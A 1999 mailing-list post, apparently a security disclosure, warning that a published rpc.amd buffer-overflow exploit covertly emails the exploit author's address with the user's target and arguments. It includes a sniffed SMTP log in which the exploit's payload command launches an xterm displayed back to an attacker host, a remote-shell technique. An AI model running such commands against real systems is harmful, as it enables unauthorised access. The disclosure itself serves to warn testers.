Hello,
Sorry if this was already known,
recently Someone named Taeho Oh published an exploit
for a buffer overflow in rpc.amd (automount)
While testing this exploit on my on server, i saw
that i was opening a connection to ohhara.postech.ac.kr
on port 25, After a little research i found out that
The exploit (In it's original form) was sending an email to
[EMAIL PROTECTED] and listing the arguments i
just entered,
There is an easy way to stop it from sending
Just comment the line: system(cmd);
Here's the log as i got it from sniffit:
EHLO
BlackMesa.com
MAIL From:<[EMAIL PROTECTED]>
SIZE=95
RCPT
To:<[EMAIL PROTECTED]>
DATA
Received: (from
root@localhost)
by BlackMesa.com (8.9.3/8.9.3) id
FAA01208
for [EMAIL PROTECTED]; Sat, 4 Sep 1999
05:30:56 +0200
Date: Sat, 4 Sep 1999 05:30:56
+0200
From: locke
<[EMAIL PROTECTED]>
Message-Id:
<[EMAIL PROTECTED]>
To:
[EMAIL PROTECTED]
10.0.0.9 /usr/X11R6/bin/xterm -display
10.0.0.8:0
.
QUIT
QUIT
(Ip's changed to protect the innocent)
Bye
